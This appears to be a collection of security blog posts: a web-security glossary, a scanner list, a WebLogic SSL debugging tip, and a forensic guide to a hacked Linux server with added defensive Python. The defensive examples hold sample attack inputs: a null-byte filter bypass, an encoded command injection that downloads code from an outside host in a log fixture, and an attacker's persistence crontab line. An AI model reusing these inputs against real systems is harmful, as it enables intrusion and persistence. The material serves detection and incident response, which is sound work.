Null Injection: An exploitation technique used to bypass sanity checking filters by adding URL encoded null-byte characters to user-supplied data. When developers create web applications in a variety of programming languages, these web applications often pass data to underlying lower-level C functions for further processing and functionality. If a user-supplied string contains a null character (\0), the web application may stop processing the string at the point of the null. Null Injection is a form of meta-character injection attack. See also “Encoding Attacks”, “Parameter Tampering”, “Meta Character Injection”.
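An added example (not from the glossary) of the mechanism described above, and of the check that defeats it: a suffix check run on the still-encoded value passes, while the same check run after decoding, with an explicit NUL test, fails. The inputs, the ALLOWED_SUFFIXES list and the helper names are constructed for this example.

```python
from urllib.parse import unquote

ALLOWED_SUFFIXES = (".jpg", ".png")

# Constructed inputs (not from the page): a benign value and one carrying an
# encoded NUL that makes the visible suffix check pass.
BENIGN = "photo.jpg"
NUL_PAYLOAD = "report.conf%00.jpg"


def check_before_decoding(raw_param: str) -> bool:
    """Weak: validates the still-encoded value, where '%00' is just three ordinary characters."""
    return raw_param.endswith(ALLOWED_SUFFIXES)


def check_after_decoding(raw_param: str) -> bool:
    """Decode exactly as the framework will, reject any NUL, then validate the canonical form."""
    decoded = unquote(raw_param)
    if "\x00" in decoded:
        return False
    return decoded.endswith(ALLOWED_SUFFIXES)


def c_string_view(raw_param: str) -> str:
    """What a C-style consumer (strcpy, fopen, ...) sees after decoding: nothing past the first NUL."""
    return unquote(raw_param).split("\x00", 1)[0]


def python_open_behaviour(raw_param: str) -> str:
    """Modern runtimes usually refuse embedded NULs rather than truncating;
    CPython raises ValueError before the file system is touched."""
    try:
        open(unquote(raw_param), "rb").close()
    except ValueError:
        return "rejected"
    except OSError:
        return "passed to the OS"
    return "opened"


if __name__ == "__main__":
    for raw in (BENIGN, NUL_PAYLOAD):
        print(raw, check_before_decoding(raw), check_after_decoding(raw),
              repr(c_string_view(raw)), python_open_behaviour(raw))
```

Note that the decode step must mirror what the application stack actually does: a value that is decoded twice downstream (so that %2500 becomes a NUL) needs the check applied after the second decode, not the first.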

OS Command Injection: See “OS Commanding”.

OS Commanding: An attack technique used to exploit web sites by executing operating-system commands through manipulating application input. See also “Parameter Tampering”, “Form Field Manipulation”.

Page Sequencing: (Obsolete) See “Insufficient Process Validation”.

Parameter Tampering: Altering or modification of the parameter name and value pairs in a URL. Also known as “URL Manipulation”. See also “Uniform Resource Locator”.

Password Recovery System: An automated process that allows a user to recover or reset his password in the event that it has been lost or forgotten. See also “Weak Password Recovery Validation”.

Predictable File Location: A technique used to access hidden web site content or functionality by making educated guesses, manually or automatically, of the names and locations of files. Predictable file locations may include directories, CGI’s, configuration files, backup files, temporary files, etc.

Secure Sockets Layer: (Acronym – SSL) An industry standard public-key protocol used to create encrypted tunnels between two network-connected devices. See also “Transport Layer Security”.

Session Credential: A string of data provided by the web server, normally stored within a cookie or URL, which identifies a user and authorizes them to perform various actions. See also “Session ID”.

Session Fixation: An attack technique that forces a user’s session credential or session ID to an explicit value. See also “Session Credential”, “Session ID”.

Session Forging: See “Session Prediction”.

Session Hi-Jacking: The result of a user’s session being compromised by an attacker. The attacker could reuse this stolen session to masquerade as the user. See also “Session Prediction”, “Session Credential”, “Session ID”.

Session ID: A string of data provided by the web server, normally stored within a cookie or URL. A Session ID tracks a user’s session, or perhaps just his current session, as he traverses the web site.

Session Manipulation: An attack technique used to hi-jack another user’s session by altering a session ID or session credential value. See also “Session Prediction”, “Session Hi-Jacking”, “Session Credential”, “Session ID”.

Session Prediction: An attack technique used to create fraudulent session credentials or guess other user’s current session ID’s. If successful, an attacker could reuse this stolen session to masquerade as another user. See also “Session Credential”, “Session ID”, “Session Hi-Jacking”.
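The defences against “Session Fixation”, “Session Prediction” and “Insufficient Session Expiration” fit in one small session store, given here as an added example (not any framework’s code): identifiers come from the operating system’s CSPRNG so they cannot be predicted, the identifier is rotated at login so a value an attacker pre-set never becomes authenticated, and entries expire server-side after an idle period. The class, its method names and the 15-minute idle limit are assumptions made for the example.

```python
import secrets
import time

SESSION_ID_BYTES = 32            # 256 bits from the OS CSPRNG: not guessable
IDLE_TIMEOUT_SECONDS = 15 * 60   # assumption for the example: a 15-minute idle limit


class SessionStore:
    """Minimal in-memory session store (added example, not a framework's API)."""

    def __init__(self, idle_timeout=IDLE_TIMEOUT_SECONDS):
        self._sessions = {}      # session id -> {"user": str | None, "last_seen": float}
        self.idle_timeout = idle_timeout

    @staticmethod
    def _fresh_id() -> str:
        # secrets.token_urlsafe draws from os.urandom. A counter, a timestamp or
        # random.random() is exactly what Session Prediction exploits.
        return secrets.token_urlsafe(SESSION_ID_BYTES)

    @staticmethod
    def _now(now):
        return time.monotonic() if now is None else now

    def new_session(self, now=None) -> str:
        """Anonymous session, e.g. for a shopping basket before login."""
        sid = self._fresh_id()
        self._sessions[sid] = {"user": None, "last_seen": self._now(now)}
        return sid

    def login(self, sid: str, user: str, now=None) -> str:
        """Authenticate and rotate: the id the client arrived with (possibly one an
        attacker fixed in its browser) is discarded, so it never carries a login."""
        self._sessions.pop(sid, None)
        new_sid = self._fresh_id()
        self._sessions[new_sid] = {"user": user, "last_seen": self._now(now)}
        return new_sid

    def logout(self, sid: str) -> None:
        """Invalidate server-side; clearing only the cookie leaves the id replayable."""
        self._sessions.pop(sid, None)

    def user_for(self, sid: str, now=None):
        """Resolve a presented id, expiring it if idle for longer than idle_timeout."""
        entry = self._sessions.get(sid)
        if entry is None:
            return None
        now = self._now(now)
        if now - entry["last_seen"] > self.idle_timeout:
            del self._sessions[sid]
            return None
        entry["last_seen"] = now
        return entry["user"]
```

The `now` parameter exists so that expiry can be exercised deterministically; in production it is left at its default and the monotonic clock is used.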

Session Replay: When a web site permits an attacker to reuse old session credentials or session ID’s for authorization. See also “Session ID”, “Session Credential”, “Insufficient Session Expiration”.

Session Tampering: See “Session Manipulation”.

SQL Injection: An attack technique used to exploit web sites by altering backend SQL statements through manipulating application input. See also “Parameter Tampering”, “Form Field Manipulation”.

SSI Injection: A server-side exploit technique that allows an attacker to send code into a web application, which will be executed by the web server. See also “Meta-Character Injection”, “Parameter Tampering”, “Form Field Manipulation”.

Transport Layer Security: (Acronym – TLS) The more secure successor to SSL. The TLS protocol provides communications privacy over the Internet. The protocol allows client/server applications to communicate in a way that is designed to prevent eavesdropping, tampering, or message forgery. TLS is based on the SSL protocol, but the two systems are not interoperable. See also “Secure Sockets Layer”.

Universal Resource Locator: (Acronym – URL) A standard way of specifying the location of an object, normally a web page, on the Internet. See also “Parameter Tampering”.

Unvalidated Input: When a web application does not properly sanity-check user-supplied data input.

URL Manipulation: Altering or modification of a web application’s parameter name and value pairs. Also known as “Parameter Tampering”.

User-Agent Manipulation: A technique used to bypass web site browser requirement restrictions by altering the value sent within an HTTP User-Agent header. See also “Cookie Manipulation”.

Verbose Messages: Detailed pieces of information revealed by a web site, which could aid an attacker in exploiting the system.

Visual Verification: A visually oriented method of anti-automation that prevents automated programs from exercising web site functionality by checking for the presence of a human user. See also “Anti-Automation”.

Vulnerability: “An occurrence of a weakness (or multiple weaknesses) within software, in which the weakness can be used by a party to cause the software to modify or access unintended data, interrupt proper execution, or perform incorrect actions that were not specifically granted to the party who uses the weakness.” – CWE (http://cwe.mitre.org/documents/glossary/index.html#Vulnerability)

Weakness: “A type of mistake in software that, in proper conditions, could contribute to the introduction of vulnerabilities within that software. This term applies to mistakes regardless of whether they occur in implementation, design, or other phases of the SDLC.” – CWE (http://cwe.mitre.org/documents/glossary/index.html#Weakness)

Weak Password Recovery Validation: When a web site permits an attacker to illegally obtain, change or recover another user’s password. See also “Password Recovery System”.

Web Application: A software application, executed by a web server, which responds to dynamic web page requests over HTTP. See also “Web Server”, “Web Application”, “Web Service”.

Web Application Scanner: See “Web Application Vulnerability Scanner”.

Web Application Security: The science of information security relating to the World Wide Web, HTTP and web application software. Also known as “Web Security”.

Web Application Firewall: An intermediary device, sitting between a web-client and a web server, analyzing OSI Layer-7 messages for violations in the programmed security policy. A web application firewall is used as a security device protecting the web server from attack. See also “Web Application Security”, “Web Server”.

Web Application Vulnerability Scanner: An automated security program that searches for software vulnerabilities within web applications. See also “Web Application Security”.

Web Browser: A program used to display HyperText Markup Language (HTML) web pages sent by a web server. See also “ActiveX controls”, “Cookie”, “Java Applets”, “JavaScript”, “Client-Side Scripting”.

Web (or browser) cache poisoning: The act of adding/overwriting a cache entry (of a caching proxy server, or a browser) with forged and possibly malicious data is called cache poisoning. In its most potent form, an attacker can force an arbitrary entry (URL of choice, page contents of choice) into the cache. In HTTP response splitting, the attacker can choose the URL’s path and query (the host, port and scheme must be the vulnerable host’s), and the entire page contents. In HTTP request smuggling, the attacker can choose the URL as in HTTP response splitting, but the page contents must be obtained from a URL on the site. At any rate, cache poisoning can be considered a form of defacement, whose scope is determined by the coverage of the cache (i.e. browser – 1 user, forward proxy – 1 ISP/organization, reverse proxy – all users), and the strength of the attack (full page control over /index.html vs. partial control).

Web Security: See “Web Application Security”.

Web Security Assessment: A process of performing a security review of a web application by searching for design flaws, vulnerabilities and inherent weaknesses. See also “Web Application Security”.

Web Security Scanner: See “Web Application Vulnerability Scanner”.

Web Server: A general-purpose software application that handles and responds to HTTP requests. A web server may utilize a web application for dynamic web page content. See also “Web Application”, “Application Server”, “HyperText Transfer Protocol”.

Web Service: A software application that uses Extensible Markup Language (XML) formatted messages to communicate over HTTP. Typically, software applications interact with web services rather than normal users. See also “Web Server”, “Web Application”, “Application Server”, “HyperText Transfer Protocol”.

Web Application Security Scanner List

The following list of products and tools provide web application security scanner functionality. Note that the tools on this list are not being endorsed by the Web Application Security Consortium – any tool that provides web application security scanning functionality will be listed here. If you know of a tool that should be added to this list, please contact Brian Shura at bshura73@gmail.com.

Commercial Tools
Acunetix WVS by Acunetix
AppScan by IBM
Burp Suite Professional by PortSwigger
Hailstorm by Cenzic
N-Stalker by N-Stalker
Nessus by Tenable Network Security
NetSparker by Mavituna Security
NeXpose by Rapid7
NTOSpider by NTObjectives
ParosPro by MileSCAN Technologies
Retina Web Security Scanner by eEye Digital Security
WebApp360 by nCircle
WebInspect by HP
WebKing by Parasoft
Websecurify by GNUCITIZEN

Software-as-a-Service Providers
AppScan OnDemand by IBM
ClickToSecure by Cenzic
QualysGuard Web Application Scanning by Qualys
Sentinel by WhiteHat
Veracode Web Application Security by Veracode
VUPEN Web Application Security Scanner by VUPEN Security
WebInspect by HP
WebScanService by Elanize KG

Free / Open Source Tools
Arachni by Tasos Laskos
Grabber by Romain Gaucher
Grendel-Scan by David Byrne and Eric Duprey
Paros by Chinotec
Andiparos
Zed Attack Proxy
Powerfuzzer by Marcin Kozlowski
SecurityQA Toolbar by iSEC Partners
Skipfish by Michal Zalewski
W3AF by Andres Riancho
Wapiti by Nicolas Surribas
Watcher by Casaba Security
WATOBO by siberas
Websecurify by GNUCITIZEN
Zero Day Scan

SSL handshake failure debug on weblogic

We can add an environment variable JAVA_OPTIONS with this value: "-Dssl.debug=true -Dweblogic.StdoutDebugEnabled=true -Djavax.net.debug=all"

Also, in WLS I enabled debugging for these topics: Environment -> Servers -> AdminServer -> tab 'Debug': under Default: DebugSSL; under Weblogic, node 'Security': certpath, certrevocchecking, credmap, keystore and ssl.

how to treat a Linux hacked server

This guide is not a step by step tutorial on how to clean a compromised server; rather, it is a reference to illustrate what tools are available for performing an analysis of the compromise. The goal of this guide is to show you what information is available to help you determine:

Point of entry
The origin of the attack
What files were compromised
What level of access the attacker obtained
An audit trail of the attacker’s footprints

There are many different types of compromises available to exploit a UNIX server. Under many circumstances, a server is exploited using common techniques such as a brute force attack to guess a weak password, or attempting to use known vulnerabilities in software in the hope that the server is not on a regular patch schedule. Whatever the method, it is important to understand how the machine got compromised so you can determine the extent of damage to your server and other hosts accessible to this machine.

During many root level compromises, the most straightforward approach to recovery is to perform a clean install of the server and restore any critical data from known good backups. However, until the entry point of the compromise is known, this may not be enough, as the compromise needs to be understood so that the security hole can be properly closed.

Documentation

When you are notified that a system under your control may be compromised, you want to obtain as much information as possible from the complainant. This includes:

How was the initial problem found?
Can the time of the compromise be estimated?
Has the server been modified since the compromise was detected?
Anything else the complainant says that is important.

IMPORTANT NOTE: If you are planning on getting law enforcement involved, it is imperative that no additional actions are taken on the server. The server must remain in its current state for forensic and evidence collection purposes.

If you choose to proceed with the investigation, document anything you find on the server. It can be as simple as a copy/paste of the command and its results.

Tools used for investigation

In the attacker’s ideal scenario, all important log files would have been wiped so their tracks are clean. Oftentimes however, this doesn’t happen. This leaves some valuable clues in finding what was done. It may also help determine if this was a basic web hack, or a root level compromise. Below are some of the basic commands that I’ll look through when trying to find that one thread so I can unravel the rest of the compromise.

last

This will list the sessions of users that recently logged into the system and include the timestamps, hostnames and whether or not the user is still logged in. An odd IP address may be cross referenced against a brute force ssh attack in /var/log/messages or /var/log/secure which may indicate how the attacker gained entry, what user they got in as, and if they were able to escalate their privilege to root.

ls -lart /

This will provide a time ordered list of files and directories that can be correlated against the time of the compromise. This listing will help determine what has been added or removed from the system.

netstat -na

This will list the current listening sockets on the machine. Running this may reveal any back doors that are listening, or any errant services that are running.

ps -wauxef

This will be helpful in tracking down any errant processes that are listening, as well as help show other odd processes, such as the user www running a bash process for example. lsof | grep <pid> can also be used to further find what open files this process is using. Concurrently, cat /proc/<pid>/cmdline may also let you know where the file that controls this process exists.

bash_history

The history file often becomes the Rosetta stone of tracking down what took place during a compromise. Looking through the user’s .bash_history file will often show exactly what commands were executed, what malicious programs were downloaded, and possibly what directories they were focusing on.

top

Oftentimes, a malicious process will be causing CPU contention issues within the environment, and will usually show up near the top of the list. Any processes that are causing the CPU contention issues should be considered suspicious when tracking down a compromise.

strace

Running strace -p <pid> on a suspicious process may yield important insight into what the process is doing.

In some cases, the commands above may not provide many clues to what happened during the attack. This is where more fine grained tools must be used.

Before moving forward, it should be confirmed that the binaries you are using to investigate are not trojanned versions. These trojanned versions can perform whatever tasks the attacker wishes, which include not showing information that could trace what the compromise was trying to accomplish.

So to verify we have a good working set of tools:

rpm -Va

Verifying a package compares information about the installed files in the package with information about the files taken from the package meta data stored in the rpm database. Among other things, verifying compares the size, MD5 sum, permissions, type, owner and group of each file. Any discrepancies are displayed.

When running this command, it is important to note that any files flagged in the following directories may mean you are using a trojanned version of the binary, and therefore cannot trust its output:

/bin
/sbin
/usr/bin
/usr/sbin

An example of a trojanned file:
S.5....T /bin/login

rpm -qa --last

This can be used to show which RPMs have been installed, in chronological order (most recent first; the --last option sorts by install time). However, in the case of a root compromise, the rpm database could be altered and therefore not trusted.

lsattr

In cases where the attacker was able to get root access and trojan certain binaries, sometimes they will set that binary to be immutable so you cannot reinstall a clean version of that binary. Common directories to look in are:

/bin
/sbin
/usr/bin
/usr/sbin

An example of a file that had its attributes set to immutable:
-------i----- /bin/ps

Under normal circumstances in these directories, the attributes should all look similar to:
------------- /bin/ps
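The two checks above (rpm -Va for changed or missing package files, lsattr for the immutable bit) produce output that is tedious to read by eye on a busy host. The following Python is an added example, not part of the guide, that parses both formats and reduces them to the lines a responder needs to look at. The sample output is constructed from the lines shown above (the paths and flags are illustrative), and the guide’s caveat still applies: the output is only worth parsing if it was produced by rpm and lsattr binaries you trust.

```python
import subprocess

TRUSTED_DIRS = ("/bin", "/sbin", "/usr/bin", "/usr/sbin")

# Constructed sample output, modelled on the lines shown in the guide
# (paths and flags are illustrative, not captured from a real host).
RPM_VA_SAMPLE = """\
S.5....T    /bin/login
.......T  c /etc/ssh/sshd_config
.M......    /usr/bin/passwd
missing     /usr/sbin/lsof
"""

LSATTR_SAMPLE = """\
------------- /bin/ls
-------i----- /bin/ps
s---ia------- /sbin/shs
------------- /usr/bin/netstat
"""


def in_trusted_dir(path: str) -> bool:
    return any(path.startswith(d + "/") for d in TRUSTED_DIRS)


def parse_rpm_verify(output: str):
    """Yield (flags, path) per 'rpm -Va' line. flags is the test string
    (S size, M mode, 5 digest, D device, L link, U user, G group, T mtime, P caps)
    or the word 'missing'; the optional file-type column ('c', 'd', ...) is skipped."""
    for line in output.splitlines():
        parts = line.split()
        if len(parts) >= 2:
            yield parts[0], parts[-1]


def suspicious_rpm_entries(output: str):
    """Files in the trusted directories whose size or digest changed, or that are
    gone. A lone 'T' (mtime) or 'M' (mode) deserves a look but is weaker evidence."""
    hits = []
    for flags, path in parse_rpm_verify(output):
        if not in_trusted_dir(path):
            continue
        if flags == "missing" or "S" in flags or "5" in flags:
            hits.append(path)
    return hits


def immutable_files(output: str):
    """Paths in 'lsattr' output carrying the immutable (i) or append-only (a)
    attribute. Neither is normal for a distribution binary, and both block a reinstall."""
    hits = []
    for line in output.splitlines():
        parts = line.split(None, 1)
        if len(parts) == 2 and ("i" in parts[0] or "a" in parts[0]):
            hits.append(parts[1])
    return hits


def collect_live():
    """Run the real commands on this host; only meaningful with trusted binaries."""
    rpm_out = subprocess.run(["rpm", "-Va"], capture_output=True, text=True).stdout
    lsattr_out = "".join(
        subprocess.run(["lsattr", d], capture_output=True, text=True).stdout
        for d in TRUSTED_DIRS
    )
    return suspicious_rpm_entries(rpm_out), immutable_files(lsattr_out)


if __name__ == "__main__":
    print("rpm -Va hits:", suspicious_rpm_entries(RPM_VA_SAMPLE))
    print("lsattr hits:", immutable_files(LSATTR_SAMPLE))
```

Running the sample reports /bin/login and /usr/sbin/lsof from the rpm output and /bin/ps and /sbin/shs from lsattr; the sshd_config mtime change is ignored because it lies outside the trusted binary directories, which is where a responder would check it separately.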

find

Find is a UNIX tool that can be critical in finding files that have been recently modified. For instance, to find files that have been modified in the last five days, run:

find / -mtime -5

(Note the minus sign: a bare 5 would match only files modified exactly five days ago.)

Common Directories Where Web Exploits Are Found
Check world writable directories that Apache would commonly write its temp files to. Locations such as:

ls -al /tmp
ls -al /var/tmp
ls -al /dev/shm

If you have directories on your website that are chmod’ed 777, those are suspect as well.

When checking these directories, you are looking for any files that you don’t recognize, or look suspicious. Be on the lookout for hidden files or files that have execute permissions.

Finding point of entry

If you found anything using the information above, that means that you most likely have a timestamp of when the malicious file(s) were installed on the server.

You can now use that timestamp to start combing through your website’s access logs, looking for any suspicious entries in the log during that time period. If you find something, you can cross reference it to where you found the malicious files, then you likely just narrowed down the point of entry.

While the large majority of compromises do come from exploitable code within your website, you cannot rule out other entry points. So be sure to dig through /var/log/* to see if there is anything suspicious during the reported time frame.

Example of investigation

Below is a real example of one of my investigations, documenting my thought process.

When I am investigating a suspected root level compromise, the first thing that needs to be verified is whether or not this was just a basic web hack, or if root privileges were really gained. 80% of the time, it’s just a simple web hack that can be safely cleaned.

Step 1: Quick and dirty check to see if root privileges were gained:

lsattr /usr/sbin | less
lsattr /usr/bin | less
lsattr /bin | less
lsattr /sbin | less

What to look for:

You’re checking for modified attributes, such as binaries being set immutable, etc.

Results:

s---ia------- /sbin/shs
^ When you run strings on that file, you see it’s a backdoor shell.

Step 2: See if the attacker cleaned his tracks.

Many times, these are script kiddies or dummies who just forgot to clean up after themselves.

What to look for:

All user accounts in /etc/passwd that have a valid shell:
cat /home/$USER/.bash_history
Root’s history:
history
cat /root/.bash_history

Results:

The /root/.bash_history revealed what the attacker did on the server, which includes:

They downloaded some malicious tools to serve up via apache in /var/www/html/*.
They also installed some IRC stuff in /var/tmp/.ICE-unix (as well as other tools).
They modified root’s crontab to re-download the malicious tools if someone removes them from the server:
* * * * * /var/tmp/.ICE-unix/update >/dev/null 2>&1

Step 3: Check for basic web hacks

Normally if steps 1 and 2 do not show anything, most likely its just a simple web hack that CAN be cleaned easily without formatting the server or otherwise causing panic.

In this specific investigation, that logic is null and void since we know that root privileges were gained. However, it is included here for reference, and it is relevant anyway because I believe that the attacker exploited phpmyadmin. Once they had their backdoor phpshell loaded, they were able to perform a local root exploit to escalate their privileges.

What to look for:

Hidden files and directories in world readable directories that apache would normally write tmp files to:
ls -al /var/tmp |less
ls -al /tmp
ls -al /dev/shm

Results:

drwx------ 3 70 70 4096 Nov 19 02:00 /var/tmp/.ICE-unix
^ There is a whole bunch of fun stuff in there.

If items are found in here, you must attempt to track down the entry point so you can have the client take down the site, upgrade their site code, or otherwise fix the exploitable code. One quick and dirty way is by looking at step 5. However, if you see irc bots and stuff running in the output of ps -waux, then you can try to catch where the process is running from by using lsof, or ps -wauxxef | grep <pid>.

Step 4: Look for PID’s listening for incoming connections

What to look for:

netstat -natp : look for any suspicious connections running on odd ports
ps -wauxxef : look for suspicious files like bash running under www context
lsof : helps to determine where the pid above is running from

Results:

tcp 0 0 0.0.0.0:1144 0.0.0.0:* LISTEN 1008/bash
tcp 0 1 172.16.23.13:60968 22.22.22.22:7000 SYN_SENT 6860/sshd

There are also a fair amount of other ssh ESTABLISHED connections running from high level ports. This means the attackers are still connected to this machine. I can’t see them because they probably modified the binaries to hide themselves.

[root@www tmp]# netstat -natp |grep sshd |awk '{print $4,$5,$6,$7}'
0.0.0.0:22 0.0.0.0:* LISTEN 1046/sshd
172.16.23.13:60986 22.22.22.22:6667 SYN_SENT 6860/sshd
123.123.123.123:22 22.22.22.22:59361 ESTABLISHED 22795/sshd
123.123.123.123:22 22.22.22.22:57434 ESTABLISHED 22796/sshd
123.123.123.123:57139 143.143.143.143:6667 ESTABLISHED 6860/sshd
123.123.123.123:57402 22.22.22.22:6667 ESTABLISHED 6860/sshd
123.123.123.123:22 143.143.143.143:49238 ESTABLISHED 8860/sshd
123.123.123.123:57134 22.22.22.22:6667 ESTABLISHED 6860/sshd
123.123.123.123:56845 22.22.22.22:6667 ESTABLISHED 6860/sshd
123.123.123.123:57127 143.143.143.143:6667 ESTABLISHED 6860/sshd
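The netstat output above is small enough to read by hand, but the same reasoning can be written down so it is applied consistently. The Python below is an added example, not part of the guide: it parses netstat -natp rows and sorts them into unexpected listeners (a shell listening on a port), connections initiated by daemons that should only ever accept (the “sshd” that is really dialling IRC servers), and ordinary inbound sessions. The sample rows are constructed from the ones shown above, and EXPECTED_LISTENERS, ACCEPT_ONLY_DAEMONS and IRC_PORTS are assumptions about the host that must be replaced with its real service inventory. Because the process name column is whatever the process calls itself, the rules key on behaviour (who listens where, who dials out), not on the name alone.

```python
# Constructed sample modelled on the netstat -natp output shown in the guide;
# addresses, ports and PIDs are illustrative only.
NETSTAT_SAMPLE = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      1046/sshd
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      2211/httpd
tcp        0      0 0.0.0.0:1144            0.0.0.0:*               LISTEN      1008/bash
tcp        0      1 172.16.23.13:60968      22.22.22.22:7000        SYN_SENT    6860/sshd
tcp        0      0 123.123.123.123:22      22.22.22.22:59361       ESTABLISHED 22795/sshd
tcp        0      0 123.123.123.123:57139   143.143.143.143:6667    ESTABLISHED 6860/sshd
tcp        0      0 123.123.123.123:80      198.51.100.7:41022      ESTABLISHED 2214/httpd
"""

# Assumptions about this host; replace with its documented service inventory.
EXPECTED_LISTENERS = {22: "sshd", 80: "httpd", 443: "httpd"}
ACCEPT_ONLY_DAEMONS = {"sshd", "httpd"}           # never expected to originate connections
IRC_PORTS = {6665, 6666, 6667, 6668, 6669, 7000}  # classic IRC C2 ports


def _host_port(addr: str):
    host, _, port = addr.rpartition(":")
    return host, (int(port) if port.isdigit() else None)


def parse_netstat(output: str):
    """Parse the TCP rows of 'netstat -natp'; header and non-TCP lines are skipped."""
    rows = []
    for line in output.splitlines():
        parts = line.split()
        if len(parts) < 7 or not parts[0].startswith("tcp"):
            continue
        local, foreign, state, prog = parts[3], parts[4], parts[5], parts[6]
        pid, _, name = prog.partition("/")
        _, lport = _host_port(local)
        fhost, fport = _host_port(foreign)
        rows.append({"lport": lport, "fhost": fhost, "fport": fport,
                     "state": state, "pid": pid, "name": name})
    return rows


def triage_sockets(output: str):
    """Sort each socket into one of three buckets a responder cares about."""
    findings = {"unexpected_listeners": [], "outbound_from_daemons": [], "inbound_sessions": []}
    for r in parse_netstat(output):
        item = (r["pid"], r["name"], r["lport"], r["fhost"], r["fport"], r["state"])
        if r["state"] == "LISTEN":
            # A listener on a port this host does not serve, or served by the wrong
            # program (bash, perl, ...), is the back door the guide describes.
            if EXPECTED_LISTENERS.get(r["lport"]) != r["name"]:
                findings["unexpected_listeners"].append(item)
        elif r["lport"] in EXPECTED_LISTENERS:
            # Local side is a service port: a client connected to us.
            findings["inbound_sessions"].append(item)
        else:
            # Local side is ephemeral, so this process initiated the connection.
            # An accept-only daemon dialling out, or anything reaching an IRC
            # port, matches the pattern in the guide's example.
            if r["name"] in ACCEPT_ONLY_DAEMONS or r["fport"] in IRC_PORTS:
                findings["outbound_from_daemons"].append(item)
    return findings


if __name__ == "__main__":
    for bucket, items in triage_sockets(NETSTAT_SAMPLE).items():
        print(bucket)
        for item in items:
            print("   ", item)
```

On the sample this reports the bash listener on 1144 and both outbound connections from PID 6860, while the two real inbound sessions on ports 22 and 80 land in the informational bucket.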

Step 5: Determine point of entry for original compromise

What to look for:

/var/log/[messages|secure] : check for brute forced ssh attempts.
apache access logs and error logs : May help determine which site is exploitable. Most attacks are linked against this.

When checking this, also cross reference IP’s against the logs if you think there is a chance it may have originated from there. Its a quick and easy way to trace down the origin point.

Simple ways of checking servers with a ton of web logs like the one used in this example:

cd /var/log/httpd
for i in `ls * |grep access`; do echo $i && grep wget $i; done
for i in `ls * |grep access`; do echo $i && grep curl $i; done

NOTE: wget was searched for because it was in root’s history file, in what I believe may have been part of the entry point.

Results:
Evidence found that the phpmyadmin installation in /var/www/html was exploited. The version of phpmyadmin was severely outdated. Keeping phpmyadmin patched on a regular schedule would have prevented this from happening.
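The grep loop in step 5 is the right idea; the added Python below (not part of the guide) does the same cross-referencing a little more carefully: it restricts the search to a window around the timestamp of the dropped files, decodes the request line before looking for download tools so trivial percent-encoding of the keyword is caught, and then intersects the resulting client addresses with the sources of failed ssh logins in /var/log/secure. The access log and secure log lines, the file timestamp and the TOOL_PATTERNS list are all constructed for the example.

```python
import re
from collections import Counter
from datetime import datetime, timedelta, timezone
from urllib.parse import unquote

# Constructed log lines (not from the page): a combined-format Apache access log
# and a few /var/log/secure entries, with illustrative addresses.
ACCESS_SAMPLE = """\
198.51.100.7 - - [19/Nov/2012:01:12:09 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
22.22.22.22 - - [19/Nov/2012:01:57:41 +0000] "GET /phpmyadmin/ HTTP/1.1" 200 2310 "-" "Mozilla/4.0"
22.22.22.22 - - [19/Nov/2012:01:58:12 +0000] "POST /phpmyadmin/index.php?cmd=%77get%20http://203.0.113.9/update HTTP/1.1" 200 44 "-" "Mozilla/4.0"
203.0.113.5 - - [19/Nov/2012:09:30:00 +0000] "GET /downloads/curl-notes.html HTTP/1.1" 200 800 "-" "Mozilla/5.0"
"""

SECURE_SAMPLE = """\
Nov 19 01:40:02 www sshd[2211]: Failed password for invalid user admin from 22.22.22.22 port 40122 ssh2
Nov 19 01:40:05 www sshd[2211]: Failed password for invalid user admin from 22.22.22.22 port 40122 ssh2
Nov 19 01:40:09 www sshd[2213]: Failed password for root from 22.22.22.22 port 40130 ssh2
Nov 19 01:41:00 www sshd[2220]: Accepted publickey for deploy from 198.51.100.7 port 51022 ssh2
"""

# Constructed: the mtime of the dropped directory found in step 3.
FILE_TIMESTAMP = datetime(2012, 11, 19, 2, 0, tzinfo=timezone.utc)

ACCESS_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)"')
FAILED_RE = re.compile(r"Failed password for .* from (?P<ip>\S+) port")
TOOL_PATTERNS = ("wget", "curl", "fetch ")   # download tools typically seen in a first stage


def parse_access(lines: str):
    """Yield (client ip, timestamp, request line) for each parseable access-log line."""
    for line in lines.splitlines():
        m = ACCESS_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        yield m["ip"], ts, m["req"]


def tool_requests_near(lines: str, when: datetime, window: timedelta = timedelta(hours=2)):
    """Requests within +/- window of 'when' whose decoded request line names a download tool."""
    hits = []
    for ip, ts, req in parse_access(lines):
        if abs(ts - when) > window:
            continue
        if any(p in unquote(req).lower() for p in TOOL_PATTERNS):
            hits.append((ip, ts, req))
    return hits


def failed_ssh_by_ip(lines: str) -> Counter:
    """Count failed password attempts per source address in /var/log/secure."""
    return Counter(m["ip"] for m in map(FAILED_RE.search, lines.splitlines()) if m)


def cross_reference(hits, failures: Counter):
    """Addresses that both fetched a tool through the web tier and hammered sshd."""
    return {ip for ip, _, _ in hits if failures[ip] > 0}


def run_sample():
    hits = tool_requests_near(ACCESS_SAMPLE, FILE_TIMESTAMP)
    failures = failed_ssh_by_ip(SECURE_SAMPLE)
    return hits, failures, cross_reference(hits, failures)


if __name__ == "__main__":
    hits, failures, overlap = run_sample()
    for ip, ts, req in hits:
        print(ts.isoformat(), ip, req)
    print("failed ssh logins:", dict(failures))
    print("addresses seen in both logs:", overlap)
```

On the sample the encoded "%77get" request from 22.22.22.22 at 01:58 is the only hit; the later page whose path merely contains the word curl falls outside the window and is ignored, and the same address shows up three times in the failed-login counts, which is the kind of corroboration the guide is after.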

Final thoughts

Investigating web or root level exploits is more of an art than a science. After you have investigated a few dozen, you will just ‘feel’ that something is not right on the server. I cannot stress enough that when you are investigating a compromised system, you must do everything you can to determine exactly how the server got compromised in the first place. Once you have that information, you will then be able to successfully remediate the exploit.